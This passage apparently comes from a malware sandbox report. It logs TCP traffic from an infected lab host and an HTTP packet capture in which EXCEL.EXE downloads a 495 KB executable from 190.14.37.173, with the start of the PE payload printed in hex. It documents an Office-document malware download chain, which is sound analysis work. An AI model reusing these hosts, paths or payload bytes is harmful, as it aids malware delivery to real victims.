      Sep 24, 2021 15:59:50.498614073 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.498631001 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.498636961 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.498640060 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.498641968 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.498644114 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.498646021 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.498653889 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.498677015 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.498697042 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.498697996 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.498701096 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.498716116 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.498723984 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.498744965 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.498747110 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.498766899 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.498788118 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.498790026 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.498809099 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.498809099 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.498831034 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.498852015 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.498871088 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.498872995 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.498886108 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.498898029 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.498920918 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.498987913 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.499443054 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.500775099 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.544513941 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.544559002 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.544585943 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.544605017 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.544629097 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.544651031 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.544671059 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.544696093 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.544718981 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.544742107 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.544761896 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.544765949 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.544780016 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.544789076 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.544790983 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.544812918 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.544826031 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.544836044 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.544862032 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.544886112 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.544903994 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.544914007 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.544928074 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.544931889 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.544951916 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.544961929 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.544979095 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.545003891 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.545017958 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.545027018 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.545038939 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.545049906 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.545073986 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.545075893 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.545097113 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.545111895 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.545141935 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.545181036 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.546853065 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.566365004 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.566817045 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.584013939 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.584135056 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.584212065 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.584240913 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.584276915 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.584367037 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.584453106 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.584532022 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.584568977 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.584623098 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.584651947 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.584680080 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.584686041 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.584733009 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.584749937 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.584778070 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.584789038 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.584834099 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.584867001 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.584891081 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.584896088 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.584948063 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.584970951 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.585001945 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.585031986 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.585059881 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.585059881 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.585109949 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.585133076 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.585158110 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.585166931 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.585211992 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.585233927 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.585254908 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.585264921 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.585323095 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.585340023 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.585364103 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.585378885 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.585422993 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.585449934 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.585465908 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.585484982 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.585531950 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.585577965 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.585618019 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.585638046 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.585659981 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.586204052 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.589035034 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.589174032 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.625516891 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.625565052 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.625596046 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.625624895 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.625658035 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.625686884 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.625706911 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.625730038 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.625773907 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.625777960 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.625803947 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.625806093 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.625825882 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.625834942 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.625855923 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.625857115 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.625878096 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.625888109 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.625899076 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.625919104 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.625922918 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.625938892 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.625960112 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.625988007 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.625988960 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.626012087 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.626036882 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.626036882 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.626040936 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.626055002 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.626060963 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.626079082 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.626080990 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.626101971 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.626102924 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.626121044 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.626142025 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.626168966 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.626184940 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.626204967 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.627747059 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.647531986 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.647766113 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.662774086 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.662893057 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.662920952 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.662991047 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.663022995 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.663049936 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.663084984 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.663106918 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.663160086 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.663239002 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.663265944 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.663297892 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.663301945 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.663331985 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.663357973 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.663459063 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.663486004 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.663511038 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.663512945 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.663537025 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.663541079 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.663570881 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.664951086 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.665359020 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.665399075 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.665419102 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.665425062 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.665446997 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.665451050 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.665477991 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.665487051 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.665505886 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.665522099 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.665535927 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.665550947 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.665565014 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.665579081 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.665594101 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.665616035 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.665622950 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.665642023 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.665652990 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.665678024 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.665685892 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.665707111 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.665714025 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.665733099 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.665739059 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.665766954 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.665774107 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.665802956 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.665817022 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.665837049 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.665847063 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.665867090 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.665877104 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.665893078 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.665908098 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.665918112 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.665950060 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.665955067 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.665977955 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.665983915 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.666012049 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.666017056 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.666045904 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.666050911 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.666073084 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.666080952 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.666104078 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.666140079 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.666572094 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.666625023 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.668351889 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.707686901 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707715988 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707731009 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707746983 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707762957 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707779884 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707792997 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707808018 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707827091 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707839966 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707854033 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707869053 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707884073 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707895994 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707906961 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707925081 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707947016 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707967997 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707973957 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.707984924 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708002090 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708015919 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708031893 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708019018 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.708039045 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.708043098 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.708045959 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.708049059 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.708050966 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708074093 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.708076000 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708096981 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708118916 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708121061 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.708138943 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708159924 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708177090 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708225965 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.709964991 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 16:00:36.167232037 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 16:00:36.167373896 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 16:00:54.809386969 CEST8049168111.90.148.104192.168.2.22
      Sep 24, 2021 16:00:54.809559107 CEST4916880192.168.2.22111.90.148.104
      Sep 24, 2021 16:00:55.707997084 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 16:00:55.708100080 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 16:01:27.454072952 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 16:01:27.454612017 CEST4916880192.168.2.22111.90.148.104
      Sep 24, 2021 16:01:27.455084085 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 16:01:27.473510981 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 16:01:27.641577959 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 16:01:27.673065901 CEST8049168111.90.148.104192.168.2.22

      HTTP Request Dependency Graph

      • 190.14.37.173
      • 111.90.148.104
      • 51.89.115.111

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.2249167190.14.37.17380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Sep 24, 2021 15:59:27.818121910 CEST0OUTGET /44463.6668827546.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 190.14.37.173
      Connection: Keep-Alive
      Sep 24, 2021 15:59:28.861392021 CEST1INHTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 24 Sep 2021 13:59:28 GMT
      Content-Type: application/octet-stream
      Content-Length: 495616
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44463.6668827546.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$T````X`7Z2`7Z`>`a`7ZG`7Z`7Z`7Z`Rich`PEL'E!1{?9<`p/@,.text5 `.rdata@@.data<PP@.reloc$`0`@B
